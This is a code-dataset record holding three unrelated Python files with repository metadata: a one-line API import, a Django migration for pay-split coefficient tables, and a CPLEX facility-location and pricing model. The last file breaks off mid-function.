cbc78951b6a83518ca6ebb06c58b547a25edd18f
| 42
|
py
|
Python
|
app/api/__init__.py
|
smartcities-livinglab-udg/APP-SmartCheckIn
|
b0f3d6db53f4f0efa33b5be201ca56e8b721af78
|
[
"MIT"
] | null | null | null |
app/api/__init__.py
|
smartcities-livinglab-udg/APP-SmartCheckIn
|
b0f3d6db53f4f0efa33b5be201ca56e8b721af78
|
[
"MIT"
] | null | null | null |
app/api/__init__.py
|
smartcities-livinglab-udg/APP-SmartCheckIn
|
b0f3d6db53f4f0efa33b5be201ca56e8b721af78
|
[
"MIT"
] | null | null | null |
from app.api.v1 import mod_api as mod_api
| 21
| 41
| 0.809524
| 10
| 42
| 3.2
| 0.7
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027778
| 0.142857
| 42
| 1
| 42
| 42
| 0.861111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1db3401e9635cf27cbdde5a074c99a848bb74212
| 16,537
|
py
|
Python
|
upload_split_file/migrations/0001_initial.py
|
uktrade/fadmin2
|
0f774400fb816c9ca30e30b25ae542135966e185
|
[
"MIT"
] | 3
|
2020-01-05T16:46:42.000Z
|
2021-08-02T08:08:39.000Z
|
upload_split_file/migrations/0001_initial.py
|
uktrade/fadmin2
|
0f774400fb816c9ca30e30b25ae542135966e185
|
[
"MIT"
] | 30
|
2019-11-28T15:16:35.000Z
|
2021-08-16T14:49:58.000Z
|
upload_split_file/migrations/0001_initial.py
|
uktrade/fadmin2
|
0f774400fb816c9ca30e30b25ae542135966e185
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.7 on 2021-12-09 11:49
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
class Migration(migrations.Migration):
    """Initial migration for the upload_split_file app.

    Auto-generated (Django 3.2.7). Creates three pay-split-coefficient
    tables (upload, previous-year and current) plus the matching
    simple_history tracking tables for each of them.
    """

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ("previous_years", "0004_auto_20210707_1008"),
        ("forecast", "0008_amend_views_20210802_1439"),
        ("core", "0011_alter_historicaluser_first_name"),
    ]

    operations = [
        # History table for UploadPaySplitCoefficient (includes row_number)
        migrations.CreateModel(
            name="SimpleHistoryUploadPaySplitCoefficient",
            fields=[
                (
                    "id",
                    models.BigIntegerField(
                        auto_created=True, blank=True, db_index=True, verbose_name="ID"
                    ),
                ),
                ("created", models.DateTimeField(blank=True, editable=False)),
                ("updated", models.DateTimeField(blank=True, editable=False)),
                (
                    "directorate_code",
                    models.CharField(max_length=6, verbose_name="Directorate Code"),
                ),
                (
                    "split_coefficient",
                    models.IntegerField(
                        default=0,
                        validators=[
                            django.core.validators.MinValueValidator(0),
                            django.core.validators.MaxValueValidator(9999),
                        ],
                    ),
                ),
                ("row_number", models.IntegerField(default=0)),
                ("history_id", models.AutoField(primary_key=True, serialize=False)),
                ("history_date", models.DateTimeField()),
                ("history_change_reason", models.CharField(max_length=100, null=True)),
                (
                    "history_type",
                    models.CharField(
                        choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
                        max_length=1,
                    ),
                ),
                (
                    "financial_code_to",
                    models.ForeignKey(
                        blank=True,
                        db_constraint=False,
                        null=True,
                        on_delete=django.db.models.deletion.DO_NOTHING,
                        related_name="+",
                        to="forecast.financialcode",
                    ),
                ),
                (
                    "financial_period",
                    models.ForeignKey(
                        blank=True,
                        db_constraint=False,
                        null=True,
                        on_delete=django.db.models.deletion.DO_NOTHING,
                        related_name="+",
                        to="forecast.financialperiod",
                    ),
                ),
                (
                    "history_user",
                    models.ForeignKey(
                        null=True,
                        on_delete=django.db.models.deletion.SET_NULL,
                        related_name="+",
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
            ],
            options={
                "verbose_name": "historical upload pay split coefficient",
                "ordering": ("-history_date", "-history_id"),
                "get_latest_by": "history_date",
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # History table for PreviousYearPaySplitCoefficient (adds financial_year)
        migrations.CreateModel(
            name="SimpleHistoryPreviousYearPaySplitCoefficient",
            fields=[
                (
                    "id",
                    models.BigIntegerField(
                        auto_created=True, blank=True, db_index=True, verbose_name="ID"
                    ),
                ),
                ("created", models.DateTimeField(blank=True, editable=False)),
                ("updated", models.DateTimeField(blank=True, editable=False)),
                (
                    "directorate_code",
                    models.CharField(max_length=6, verbose_name="Directorate Code"),
                ),
                (
                    "split_coefficient",
                    models.IntegerField(
                        default=0,
                        validators=[
                            django.core.validators.MinValueValidator(0),
                            django.core.validators.MaxValueValidator(9999),
                        ],
                    ),
                ),
                ("history_id", models.AutoField(primary_key=True, serialize=False)),
                ("history_date", models.DateTimeField()),
                ("history_change_reason", models.CharField(max_length=100, null=True)),
                (
                    "history_type",
                    models.CharField(
                        choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
                        max_length=1,
                    ),
                ),
                (
                    "financial_code_to",
                    models.ForeignKey(
                        blank=True,
                        db_constraint=False,
                        null=True,
                        on_delete=django.db.models.deletion.DO_NOTHING,
                        related_name="+",
                        to="previous_years.archivedfinancialcode",
                    ),
                ),
                (
                    "financial_period",
                    models.ForeignKey(
                        blank=True,
                        db_constraint=False,
                        null=True,
                        on_delete=django.db.models.deletion.DO_NOTHING,
                        related_name="+",
                        to="forecast.financialperiod",
                    ),
                ),
                (
                    "financial_year",
                    models.ForeignKey(
                        blank=True,
                        db_constraint=False,
                        null=True,
                        on_delete=django.db.models.deletion.DO_NOTHING,
                        related_name="+",
                        to="core.financialyear",
                    ),
                ),
                (
                    "history_user",
                    models.ForeignKey(
                        null=True,
                        on_delete=django.db.models.deletion.SET_NULL,
                        related_name="+",
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
            ],
            options={
                "verbose_name": "historical previous year pay split coefficient",
                "ordering": ("-history_date", "-history_id"),
                "get_latest_by": "history_date",
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # History table for PaySplitCoefficient
        migrations.CreateModel(
            name="SimpleHistoryPaySplitCoefficient",
            fields=[
                (
                    "id",
                    models.BigIntegerField(
                        auto_created=True, blank=True, db_index=True, verbose_name="ID"
                    ),
                ),
                ("created", models.DateTimeField(blank=True, editable=False)),
                ("updated", models.DateTimeField(blank=True, editable=False)),
                (
                    "directorate_code",
                    models.CharField(max_length=6, verbose_name="Directorate Code"),
                ),
                (
                    "split_coefficient",
                    models.IntegerField(
                        default=0,
                        validators=[
                            django.core.validators.MinValueValidator(0),
                            django.core.validators.MaxValueValidator(9999),
                        ],
                    ),
                ),
                ("history_id", models.AutoField(primary_key=True, serialize=False)),
                ("history_date", models.DateTimeField()),
                ("history_change_reason", models.CharField(max_length=100, null=True)),
                (
                    "history_type",
                    models.CharField(
                        choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
                        max_length=1,
                    ),
                ),
                (
                    "financial_code_to",
                    models.ForeignKey(
                        blank=True,
                        db_constraint=False,
                        null=True,
                        on_delete=django.db.models.deletion.DO_NOTHING,
                        related_name="+",
                        to="forecast.financialcode",
                    ),
                ),
                (
                    "financial_period",
                    models.ForeignKey(
                        blank=True,
                        db_constraint=False,
                        null=True,
                        on_delete=django.db.models.deletion.DO_NOTHING,
                        related_name="+",
                        to="forecast.financialperiod",
                    ),
                ),
                (
                    "history_user",
                    models.ForeignKey(
                        null=True,
                        on_delete=django.db.models.deletion.SET_NULL,
                        related_name="+",
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
            ],
            options={
                "verbose_name": "historical pay split coefficient",
                "ordering": ("-history_date", "-history_id"),
                "get_latest_by": "history_date",
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # Staging table used while uploading split files (includes row_number)
        migrations.CreateModel(
            name="UploadPaySplitCoefficient",
            fields=[
                (
                    "id",
                    models.BigAutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("created", models.DateTimeField(auto_now_add=True)),
                ("updated", models.DateTimeField(auto_now=True)),
                (
                    "directorate_code",
                    models.CharField(max_length=6, verbose_name="Directorate Code"),
                ),
                (
                    "split_coefficient",
                    models.IntegerField(
                        default=0,
                        validators=[
                            django.core.validators.MinValueValidator(0),
                            django.core.validators.MaxValueValidator(9999),
                        ],
                    ),
                ),
                ("row_number", models.IntegerField(default=0)),
                (
                    "financial_code_to",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.PROTECT,
                        related_name="to_upload_split_file_uploadpaysplitcoefficients",
                        to="forecast.financialcode",
                    ),
                ),
                (
                    "financial_period",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.PROTECT,
                        related_name="upload_split_file_uploadpaysplitcoefficients",
                        to="forecast.financialperiod",
                    ),
                ),
            ],
            options={
                "abstract": False,
                "unique_together": {("financial_period", "financial_code_to")},
            },
        ),
        # Previous-year coefficients, keyed additionally on financial_year
        migrations.CreateModel(
            name="PreviousYearPaySplitCoefficient",
            fields=[
                (
                    "id",
                    models.BigAutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("created", models.DateTimeField(auto_now_add=True)),
                ("updated", models.DateTimeField(auto_now=True)),
                (
                    "directorate_code",
                    models.CharField(max_length=6, verbose_name="Directorate Code"),
                ),
                (
                    "split_coefficient",
                    models.IntegerField(
                        default=0,
                        validators=[
                            django.core.validators.MinValueValidator(0),
                            django.core.validators.MaxValueValidator(9999),
                        ],
                    ),
                ),
                (
                    "financial_code_to",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.PROTECT,
                        related_name="to_upload_split_file_previousyearpaysplitcoefficients",
                        to="previous_years.archivedfinancialcode",
                    ),
                ),
                (
                    "financial_period",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.PROTECT,
                        related_name="upload_split_file_previousyearpaysplitcoefficients",
                        to="forecast.financialperiod",
                    ),
                ),
                (
                    "financial_year",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.PROTECT,
                        to="core.financialyear",
                    ),
                ),
            ],
            options={
                "unique_together": {
                    ("financial_year", "financial_period", "financial_code_to")
                },
            },
        ),
        # Current-year coefficients; carries the upload permission
        migrations.CreateModel(
            name="PaySplitCoefficient",
            fields=[
                (
                    "id",
                    models.BigAutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("created", models.DateTimeField(auto_now_add=True)),
                ("updated", models.DateTimeField(auto_now=True)),
                (
                    "directorate_code",
                    models.CharField(max_length=6, verbose_name="Directorate Code"),
                ),
                (
                    "split_coefficient",
                    models.IntegerField(
                        default=0,
                        validators=[
                            django.core.validators.MinValueValidator(0),
                            django.core.validators.MaxValueValidator(9999),
                        ],
                    ),
                ),
                (
                    "financial_code_to",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.PROTECT,
                        related_name="to_upload_split_file_paysplitcoefficients",
                        to="forecast.financialcode",
                    ),
                ),
                (
                    "financial_period",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.PROTECT,
                        related_name="upload_split_file_paysplitcoefficients",
                        to="forecast.financialperiod",
                    ),
                ),
            ],
            options={
                "permissions": [
                    ("can_upload_percentage_files", "Can upload percentage files")
                ],
                "abstract": False,
                "unique_together": {("financial_period", "financial_code_to")},
            },
        ),
    ]
| 39.46778
| 93
| 0.410836
| 1,036
| 16,537
| 6.333977
| 0.13417
| 0.023164
| 0.038403
| 0.060347
| 0.878238
| 0.868485
| 0.851417
| 0.843645
| 0.820786
| 0.795337
| 0
| 0.012842
| 0.49616
| 16,537
| 418
| 94
| 39.562201
| 0.774724
| 0.002721
| 0
| 0.807786
| 1
| 0
| 0.14621
| 0.056155
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012165
| 0
| 0.021898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1dfbfdb6f5067433061ca43ed950db4cb242baf6
| 22,824
|
py
|
Python
|
benders-facility-location-pricing/model_discrete_assortment.py
|
stefanoborto/optimization-equilibrium-dcm
|
3b671d42bdcc6908c02aa0b3f1cb13dc866c1f6d
|
[
"MIT"
] | null | null | null |
benders-facility-location-pricing/model_discrete_assortment.py
|
stefanoborto/optimization-equilibrium-dcm
|
3b671d42bdcc6908c02aa0b3f1cb13dc866c1f6d
|
[
"MIT"
] | null | null | null |
benders-facility-location-pricing/model_discrete_assortment.py
|
stefanoborto/optimization-equilibrium-dcm
|
3b671d42bdcc6908c02aa0b3f1cb13dc866c1f6d
|
[
"MIT"
] | null | null | null |
# CPLEX model for the choice-based facility location
# and pricing problem with discrete prices (compact formulation)
# Alternatives are duplicated to account for different possible price levels.
# General
import time
import numpy as np
# CPLEX
import cplex
from cplex.exceptions import CplexSolverError
# Project
import functions
# Data
#import data_N80_I14 as data_file
import data_N08_I10 as data_file
def getModel(data):
    """Build the compact CPLEX MILP for choice-based facility location & pricing.

    Decision variables:
      x[i][n][r] -- binary: customer n, draw r chooses duplicated alternative i
      y[i]       -- binary: duplicated alternative i (one per price level) is offered
      d[i]       -- continuous auxiliary demand of alternative i (reporting only)

    Parameters: data dict with keys 'I_tot_exp', 'I_out_exp', 'I_opt_out',
    'I_tot', 'N', 'R', 'alt', 'operator', 'p', 'customer_cost', 'fixed_cost',
    'popN', 'Pop', 'U' (utilities indexed [i, n, r]).
    Returns the ready-to-solve cplex.Cplex model.
    """
    # Initialize the model
    t_in = time.time()
    model = cplex.Cplex()

    # Set number of threads
    #model.parameters.threads.set(model.get_num_cores())
    model.parameters.threads.set(1)
    print('\n############\nTHREADS = ', end='')
    print(model.parameters.threads.get())
    print('############\n')

    ##########################################
    ##### ----- OBJECTIVE FUNCTION ----- #####
    ##########################################
    model.objective.set_sense(model.objective.sense.maximize)

    ##########################################
    ##### ----- DECISION VARIABLES ----- #####
    ##########################################

    # Customer choice variables
    objVar = []
    typeVar = []
    nameVar = []
    lbVar = []
    ubVar = []
    for i in range(data['I_tot_exp']):
        for n in range(data['N']):
            for r in range(data['R']):
                # Only alternatives run by operator 1 contribute profit margin,
                # weighted by the customer's population share over R draws
                if data['operator'][data['alt'][i]] == 1:
                    objVar.append((data['p'][i] - data['customer_cost'][data['alt'][i]]) * data['popN'][n]/data['R'])
                else:
                    objVar.append(0.0)
                typeVar.append(model.variables.type.binary)
                nameVar.append('x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']')
                lbVar.append(0.0)
                ubVar.append(1.0)

    model.variables.add(obj = [objVar[i] for i in range(len(objVar))],
                        types = [typeVar[i] for i in range(len(typeVar))],
                        lb = [lbVar[i] for i in range(len(typeVar))],
                        ub = [ubVar[i] for i in range(len(typeVar))],
                        names = [nameVar[i] for i in range(len(nameVar))])

    # Facility location variables
    objVar = []
    typeVar = []
    nameVar = []
    for i in range(data['I_tot_exp']):
        # Opening a facility of operator 1 costs its fixed cost
        if data['operator'][data['alt'][i]] == 1:
            objVar.append(-data['fixed_cost'][data['alt'][i]])
        else:
            objVar.append(0.0)
        typeVar.append(model.variables.type.binary)
        nameVar.append('y[' + str(i) + ']')

    model.variables.add(obj = [objVar[i] for i in range(len(objVar))],
                        types = [typeVar[i] for i in range(len(typeVar))],
                        names = [nameVar[i] for i in range(len(nameVar))])

    # Auxiliary demand variables
    typeVar = []
    nameVar = []
    lbVar = []
    ubVar = []
    for i in range(data['I_tot_exp']):
        typeVar.append(model.variables.type.continuous)
        nameVar.append('d[' + str(i) + ']')
        lbVar.append(0.0)
        ubVar.append(data['Pop'])

    model.variables.add(types = [typeVar[i] for i in range(len(typeVar))],
                        lb = [lbVar[i] for i in range(len(typeVar))],
                        ub = [ubVar[i] for i in range(len(typeVar))],
                        names = [nameVar[i] for i in range(len(nameVar))])

    print('\nCPLEX model: all decision variables added. N variables: %r. Time: %r'\
          %(model.variables.get_num(), round(time.time()-t_in,2)))

    # Creating a dictionary that maps variable names to indices, to speed up constraints creation
    nameToIndex = { n : j for j, n in enumerate(model.variables.get_names()) }

    #########################################
    ##### -------- CONSTRAINTS -------- #####
    #########################################
    indicesConstr = []
    coefsConstr = []
    sensesConstr = []
    rhsConstr = []

    ###################################################
    ### ------ Instance-specific constraints ------ ###
    ###################################################

    ### --- Instance-specific constraints on the binary variables --- ###
    # Opt-out alternatives are always offered (y fixed to 1)
    for i in range(data['I_out_exp']):
        indicesConstr.append([nameToIndex['y[' + str(i) + ']']])
        coefsConstr.append([1.0])
        sensesConstr.append('E')
        rhsConstr.append(1.0)

    ### --- Choose at most one price level per alternative --- ###
    for alt in range(data['I_opt_out'], data['I_tot']):
        ind = []
        co = []
        for i in range(data['I_out_exp'], data['I_tot_exp']):
            if data['alt'][i] == alt:
                ind.append(nameToIndex['y[' + str(i) + ']'])
                co.append(1.0)
        indicesConstr.append(ind)
        coefsConstr.append(co)
        sensesConstr.append('L')
        rhsConstr.append(1.0)

    ###################################################
    ### ------------ Choice constraints ----------- ###
    ###################################################

    # Each customer chooses one alternative
    for n in range(data['N']):
        for r in range(data['R']):
            ind = []
            co = []
            for i in range(data['I_tot_exp']):
                ind.append(nameToIndex['x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'])
                co.append(1.0)
            indicesConstr.append(ind)
            coefsConstr.append(co)
            sensesConstr.append('E')
            rhsConstr.append(1.0)

    # A customer cannot choose an alternative that is not offered
    for i in range(data['I_tot_exp']):
        for n in range(data['N']):
            for r in range(data['R']):
                indicesConstr.append([nameToIndex['x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'],
                                      nameToIndex['y[' + str(i) + ']']])
                coefsConstr.append([1.0, -1.0])
                sensesConstr.append('L')
                rhsConstr.append(0.0)

    # A customer chooses the alternative with the highest utility
    # (sum_j U[j,n,r] * x[j][n][r] >= U[i,n,r] * y[i] for every offered i)
    for i in range(data['I_tot_exp']):
        for n in range(data['N']):
            for r in range(data['R']):
                ind = []
                co = []
                for j in range(data['I_tot_exp']):
                    ind.append(nameToIndex['x[' + str(j) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'])
                    co.append(data['U'][j,n,r])
                ind.append(nameToIndex['y[' + str(i) + ']'])
                co.append(-data['U'][i,n,r])
                indicesConstr.append(ind)
                coefsConstr.append(co)
                sensesConstr.append('G')
                rhsConstr.append(0.0)

    #######################################
    #### ---- Auxiliary constraints --- ###
    #######################################

    ### Calculating demands (not part of the model)
    # d[i] = sum_{n,r} popN[n]/R * x[i][n][r]
    for i in range(data['I_tot_exp']):
        ind = []
        co = []
        for n in range(data['N']):
            for r in range(data['R']):
                ind.append(nameToIndex['x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'])
                co.append(-data['popN'][n]/data['R'])
        ind.append(nameToIndex['d[' + str(i) + ']'])
        co.append(1.0)
        indicesConstr.append(ind)
        coefsConstr.append(co)
        sensesConstr.append('E')
        rhsConstr.append(0.0)

    model.linear_constraints.add(lin_expr = [[indicesConstr[i], coefsConstr[i]] for i in range(len(indicesConstr))],
                                 senses = [sensesConstr[i] for i in range(len(sensesConstr))],
                                 rhs = [rhsConstr[i] for i in range(len(rhsConstr))])

    print('CPLEX model: all constraints added. N constraints: %r. Time: %r\n'\
          %(model.linear_constraints.get_num(), round(time.time()-t_in,2)))

    return model
def solveModel(data, model):
    """Solve the CPLEX model and print prices, demands and market shares.

    Parameters
    ----------
    data : dict
        Instance data ('I_tot_exp', 'alt', 'name_mapping', 'operator',
        'p', 'Pop', ...).
    model : cplex.Cplex
        Model built by getModel().

    Returns
    -------
    dict
        'facilities': numpy array of the y[i] values,
        'demand':     numpy array of the d[i] values,
        both of length data['I_tot_exp'].

    Raises
    ------
    Exception
        If CPLEX fails; the original CplexSolverError is chained as the cause.
    """
    try:
        #model.set_results_stream(None)
        #model.set_warning_stream(None)
        model.solve()

        ### PRINT OBJ FUNCTION
        print('Objective function value (maximum profit): {:10.4f}'.format(model.solution.get_objective_value()))

        ### INITIALIZE DICTIONARY OF RESULTS AND SAVE RESULTS
        results = {}
        results['facilities'] = np.empty(data['I_tot_exp'])
        results['demand'] = np.empty(data['I_tot_exp'])
        for i in range(data['I_tot_exp']):
            results['facilities'][i] = model.solution.get_values('y[' + str(i) + ']')
            results['demand'][i] = model.solution.get_values('d[' + str(i) + ']')

        ### PRINT PRICES, DEMANDS, PROFITS
        print('\nAlt Name Supplier Facility Price Demand Market share')
        for i in range(data['I_tot_exp']):
            print('{:3d} {:6s} {:2d} {:4.0f} {:6.4f} {:8.3f} {:7.4f}'
                  .format(i, data['name_mapping'][data['alt'][i]], data['operator'][data['alt'][i]],
                          results['facilities'][i], data['p'][i],
                          results['demand'][i], results['demand'][i] / data['Pop']))
        return results

    except CplexSolverError as err:
        # Chain the solver error so the root cause is preserved for debugging
        # (previously the original exception context was discarded).
        raise Exception('Exception raised during solve') from err
def modelOneScenario(data, r):
    """Build and solve the subproblem restricted to a single draw/scenario r.

    Same structure as getModel() but with the scenario index r fixed, the
    customer-choice objective weighted by popN[n] (no division by R), and
    facilities flagged in data['list_open'] forced open.
    Returns (OF, y): objective value and numpy array of y[i] values.
    Raises Exception if CPLEX fails to solve.
    """
    print('SCENARIO {:4d} '.format(r), end='')

    model = cplex.Cplex()

    ##########################################
    ##### ----- OBJECTIVE FUNCTION ----- #####
    ##########################################
    model.objective.set_sense(model.objective.sense.maximize)

    ##########################################
    ##### ----- DECISION VARIABLES ----- #####
    ##########################################

    # Customer choice variables
    objVar = []
    typeVar = []
    nameVar = []
    lbVar = []
    ubVar = []
    for i in range(data['I_tot_exp']):
        for n in range(data['N']):
            # Profit margin only for operator 1, weighted by population share
            if data['operator'][data['alt'][i]] == 1:
                objVar.append((data['p'][i] - data['customer_cost'][data['alt'][i]]) * data['popN'][n])
            else:
                objVar.append(0.0)
            typeVar.append(model.variables.type.binary)
            nameVar.append('x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']')
            lbVar.append(0.0)
            ubVar.append(1.0)

    model.variables.add(obj = [objVar[i] for i in range(len(objVar))],
                        types = [typeVar[i] for i in range(len(typeVar))],
                        lb = [lbVar[i] for i in range(len(typeVar))],
                        ub = [ubVar[i] for i in range(len(typeVar))],
                        names = [nameVar[i] for i in range(len(nameVar))])

    # Facility location variables
    objVar = []
    typeVar = []
    nameVar = []
    for i in range(data['I_tot_exp']):
        if data['operator'][data['alt'][i]] == 1:
            objVar.append(-data['fixed_cost'][data['alt'][i]])
        else:
            objVar.append(0.0)
        typeVar.append(model.variables.type.binary)
        nameVar.append('y[' + str(i) + ']')

    model.variables.add(obj = [objVar[i] for i in range(len(objVar))],
                        types = [typeVar[i] for i in range(len(typeVar))],
                        names = [nameVar[i] for i in range(len(nameVar))])

    # Creating a dictionary that maps variable names to indices, to speed up constraints creation
    nameToIndex = { n : j for j, n in enumerate(model.variables.get_names()) }

    #########################################
    ##### -------- CONSTRAINTS -------- #####
    #########################################
    indicesConstr = []
    coefsConstr = []
    sensesConstr = []
    rhsConstr = []

    ### --- Instance-specific constraints on the binary variables --- ###
    # Opt-out alternatives are always offered
    for i in range(data['I_out_exp']):
        indicesConstr.append([nameToIndex['y[' + str(i) + ']']])
        coefsConstr.append([1.0])
        sensesConstr.append('E')
        rhsConstr.append(1.0)

    # Facilities already decided open in this scenario are fixed to 1
    for i in range(data['I_out_exp'], data['I_tot_exp']):
        if data['list_open'][i] == 1:
            indicesConstr.append([nameToIndex['y[' + str(i) + ']']])
            coefsConstr.append([1.0])
            sensesConstr.append('E')
            rhsConstr.append(1.0)

    ### --- Choose at most one price level per alternative --- ###
    for alt in range(data['I_opt_out'], data['I_tot']):
        ind = []
        co = []
        for i in range(data['I_out_exp'], data['I_tot_exp']):
            if data['alt'][i] == alt:
                ind.append(nameToIndex['y[' + str(i) + ']'])
                co.append(1.0)
        indicesConstr.append(ind)
        coefsConstr.append(co)
        sensesConstr.append('L')
        rhsConstr.append(1.0)

    # Each customer chooses one alternative
    for n in range(data['N']):
        ind = []
        co = []
        for i in range(data['I_tot_exp']):
            ind.append(nameToIndex['x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'])
            co.append(1.0)
        indicesConstr.append(ind)
        coefsConstr.append(co)
        sensesConstr.append('E')
        rhsConstr.append(1.0)

    # A customer cannot choose an alternative that is not offered
    for i in range(data['I_tot_exp']):
        for n in range(data['N']):
            indicesConstr.append([nameToIndex['x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'],
                                  nameToIndex['y[' + str(i) + ']']])
            coefsConstr.append([1.0, -1.0])
            sensesConstr.append('L')
            rhsConstr.append(0.0)

    # A customer chooses the alternative with the highest utility
    for i in range(data['I_tot_exp']):
        for n in range(data['N']):
            ind = []
            co = []
            for j in range(data['I_tot_exp']):
                ind.append(nameToIndex['x[' + str(j) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']'])
                co.append(data['U'][j,n,r])
            ind.append(nameToIndex['y[' + str(i) + ']'])
            co.append(-data['U'][i,n,r])
            indicesConstr.append(ind)
            coefsConstr.append(co)
            sensesConstr.append('G')
            rhsConstr.append(0.0)

    model.linear_constraints.add(lin_expr = [[indicesConstr[i], coefsConstr[i]] for i in range(len(indicesConstr))],
                                 senses = [sensesConstr[i] for i in range(len(sensesConstr))],
                                 rhs = [rhsConstr[i] for i in range(len(rhsConstr))])

    #########################################
    ##### ----------- SOLVE ----------- #####
    #########################################
    try:
        model.set_results_stream(None)
        #model.set_warning_stream(None)
        model.parameters.timelimit.set(172000.0)
        model.solve()
        OF = model.solution.get_objective_value()
        y = np.empty(data['I_tot_exp'])
        for i in range(data['I_tot_exp']):
            y[i] = model.solution.get_values('y[' + str(i) + ']')
        print(' OF {:10.4f}'.format(OF))
    except CplexSolverError:
        raise Exception('Exception raised during solve')

    return OF, y
def modelOneCustomer(data, n):
    """Build and solve the subproblem restricted to a single customer n.

    Same structure as getModel() but with the customer index n fixed: the
    choice objective is weighted by popN[n]/R and the fixed cost is scaled
    by popN[n]/Pop (this customer's share of the total population).
    Facilities flagged in data['list_open'] are forced open.
    Returns (OF, y): objective value and numpy array of y[i] values.
    Raises Exception if CPLEX fails to solve.
    """
    print('CUSTOMER {:4d} '.format(n), end='')

    model = cplex.Cplex()

    ##########################################
    ##### ----- OBJECTIVE FUNCTION ----- #####
    ##########################################
    model.objective.set_sense(model.objective.sense.maximize)

    ##########################################
    ##### ----- DECISION VARIABLES ----- #####
    ##########################################

    # Customer choice variables
    objVar = []
    typeVar = []
    nameVar = []
    lbVar = []
    ubVar = []
    for i in range(data['I_tot_exp']):
        for r in range(data['R']):
            # Profit margin only for operator 1, averaged over the R draws
            if data['operator'][data['alt'][i]] == 1:
                objVar.append((data['p'][i] - data['customer_cost'][data['alt'][i]]) * data['popN'][n] / data['R'])
            else:
                objVar.append(0.0)
            typeVar.append(model.variables.type.binary)
            nameVar.append('x[' + str(i) + ']' + '[' + str(n) + ']' + '[' + str(r) + ']')
            lbVar.append(0.0)
            ubVar.append(1.0)

    model.variables.add(obj = [objVar[i] for i in range(len(objVar))],
                        types = [typeVar[i] for i in range(len(typeVar))],
                        lb = [lbVar[i] for i in range(len(typeVar))],
                        ub = [ubVar[i] for i in range(len(typeVar))],
                        names = [nameVar[i] for i in range(len(nameVar))])

    # Facility location variables (fixed cost is adapted to F_i / |N|)
    objVar = []
    typeVar = []
    nameVar = []
    for i in range(data['I_tot_exp']):
        if data['operator'][data['alt'][i]] == 1:
            objVar.append(-data['fixed_cost'][data['alt'][i]] * data['popN'][n] / data['Pop'])
        else:
            objVar.append(0.0)
        typeVar.append(model.variables.type.binary)
        nameVar.append('y[' + str(i) + ']')

    model.variables.add(obj = [objVar[i] for i in range(len(objVar))],
                        types = [typeVar[i] for i in range(len(typeVar))],
                        names = [nameVar[i] for i in range(len(nameVar))])

    # Creating a dictionary that maps variable names to indices, to speed up constraints creation
    nameToIndex = { n : j for j, n in enumerate(model.variables.get_names()) }

    #########################################
    ##### -------- CONSTRAINTS -------- #####
    #########################################
    indicesConstr = []
    coefsConstr = []
    sensesConstr = []
    rhsConstr = []

    ### --- Instance-specific constraints on the binary variables --- ###
    # Opt-out alternatives are always offered
    for i in range(data['I_out_exp']):
        indicesConstr.append([nameToIndex['y[' + str(i) + ']']])
        coefsConstr.append([1.0])
        sensesConstr.append('E')
        rhsConstr.append(1.0)

    # Facilities already decided open are fixed to 1
    for i in range(data['I_out_exp'], data['I_tot_exp']):
        if data['list_open'][i] == 1:
            indicesConstr.append([nameToIndex['y[' + str(i) + ']']])
            coefsConstr.append([1.0])
            sensesConstr.append('E')
            rhsConstr.append(1.0)

    ### --- Choose at most one price level per alternative --- ###
    for alt in range(data['I_opt_out'], data['I_tot']):
        ind = []
        co = []
        for i in range(data['I_out_exp'], data['I_tot_exp']):
            if data['alt'][i] == alt:
                ind.append(nameToIndex['y[' + str(i) + ']'])
                co.append(1.0)
        indicesConstr.append(ind)
